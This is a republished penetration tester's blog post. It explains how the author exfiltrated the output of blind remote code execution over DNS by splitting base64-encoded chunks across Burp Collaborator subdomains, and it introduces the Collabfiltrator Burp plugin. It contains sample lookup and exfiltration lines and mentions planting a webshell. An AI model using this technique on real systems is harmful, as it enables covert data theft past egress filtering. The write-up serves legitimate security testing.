内容简介:During one of my recent penetration tests, I was able to achieve blind remote code execution on a target, however, due to egress filtering, I was unable to get any reverse shells out through commonly allowed outbound ports (e.g. 80/TCP, 443/TCP, 8080/TCP,
During one of my recent penetration tests, I was able to achieve blind remote code execution on a target, however, due to egress filtering, I was unable to get any reverse shells out through commonly allowed outbound ports (e.g. 80/TCP, 443/TCP, 8080/TCP, 53/TCP, etc).
Still, I knew I had RCE because i could successfully execute sleep commands and was able to catch DNS lookups over port 53/UDP using Burp Suite’s Collaborator Client.
I observed that I could also catch requests for subdomains of burp collaborator clients as well, when looking up collaborator domains, such as the one here:
nslookup testcat.snj3exs0opxac6hmrkuhauh5dwjm7b.burpcollaborator.net
That’s when it dawned on me that exfiltration over DNS could be an attack vector, even if it’s just enough to show me the output of
dir C:\Inetpub\wwwroot
so I can find the path to the webroot to write a webshell at the very least.
I went to work Googling for what others have done in this same situation and was surprised to find very little. I did however stumble across an excellent detailed write-up by 0xdf on how he leveraged DNS lookups to exfiltrate the output of remote code execution on a retired Hack the Box called Ethereal.
While this post gave me some strategy, I ran into some of the same common issues with exfiltration, such as spaces and special characters. Instead of messing with padding, I decided to go a different route: base64 encoding.
Base64 is an excellent method of encoding data for transportation, and quickly decoded using readily available tools. Base64 makes use of an equals sign =
to pad out the end of a string to a multiple of four. Additionally, Python’s base64 library makes use of RFC 3548 , which uses a plus symbol +
instead of a forward slash /
, found in RFC 2045 , which is used by other languages such as Ruby and Java.
While studying DNS frames, I found the maximum allowed length of a DNS name is 63 bytes per label, with a maximum of 255 bytes allowed in the fully qualified domain name (FQDN). This was something I had to take into consideration when breaking up the base64 encoded output into smaller chunks and appending them to a burp collaborator domain.
Since DNS lookups only allow A-Z, a-z, 0-9, and dashes -
, nslookups including these extra characters initially failed. To account for this, equals signs were converted to dashes ( =
–> -
), and plus signs were converted to the word PLUS
in all caps ( +
–> PLUS
), which happens to be an unlikely combination in a base64 encoded string. At the end of the base64 encoded string, I also appended an E-F
“end of file” pattern to the end to mark the final DNS lookup, as some payloads were perfectly padded out and didn’t contain any equals signs on the end.
I soon realized that the servers occasionally sent out different types of lookups ( A
Records, AAAA
Records, etc) and data often returned out of order. To account for this, I prepended an additional “preamble” subdomain ranging from 0000-9999 to each subdomain.
e.g.
0001.yOjQyIC4KZHJ3.snj3exs0opxac6hmrkuhauh5dwjm7b.burpcollaborator.net
To reassemble the output, the preamble was stripped off, dashes and plusses were restored and the base64 output string was successfully decoded back into plaintext.
total 20K drwxr-xr-x 5 root root 4.0K Mar 16 12:42 . drwx------ 15 root root 4.0K Mar 16 12:41 .. drwxr-xr-x 2 root root 4.0K Mar 16 12:41 hardtoguessdir drwxr-xr-x 2 root root 4.0K Mar 16 12:41 reallydifficulttoguessAPI drwxr-xr-x 2 root root 4.0K Mar 16 12:42 someothervhost
I realized that this ended up becoming a very tedious process to perform manually and decided to automate the process through creation of a Burp Suite Extender plugin. I quickly came up with the name “Collabfiltrator”, but didn’t know the first thing about creating a Burp Suite plugin, as Java is not one of my first languages.
I am well versed in Python, and luckily enough for me, I found Burp Suite supported plugins written in Python through the use of Jython. Jython is an implementation of the Python programming language designed to run on the Java platform.
I googled a few things but had a rough time getting started, until my talented coworker Jared Mclaren helped me write the basics for the GUI. After Jared provided me with a basic template to use, I took off running. For those of you interested in learning to write your own Burp plugins, I have heavily commented the source code of this in an attempt to hopefully make it easier to learn how to do this yourself.
To add support for both Linux and Windows, I ensured Collabfiltrator generated reliable Bash and Powershell payloads. I want to give a special thanks to Frank Scarpella for coming up with the reliable Windows Powershell payload baseline used in this project.
The plugin features an approximate 60 second timeout for the listener in case of large payloads, as well as a status indicator when the extension is listening for payloads.
Usage is fairly simple and elegant, allowing a user to generate a payload, execute the payload on the target server, and receive the output within Burp Suite, based on the output being exfiltrated over DNS.
The Burp plugin can be downloaded from the following Github link:
https://github.com/0xC01DF00D/Collabfiltrator
and detailed instructions on how to install it can be found at the Wiki.
I will be working on getting it into Portswigger’s bApp store directly through the app as well.
Enjoy, and if you like it, or found it useful, drop me a mention on Twitter at @Adam_Logue .
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Is Parallel Programming Hard, And, If So, What Can You Do About
Paul E. McKenney
The purpose of this book is to help you understand how to program shared-memory parallel machines without risking your sanity.1 By describing the algorithms and designs that have worked well in the pa......一起来看看 《Is Parallel Programming Hard, And, If So, What Can You Do About 》 这本书的介绍吧!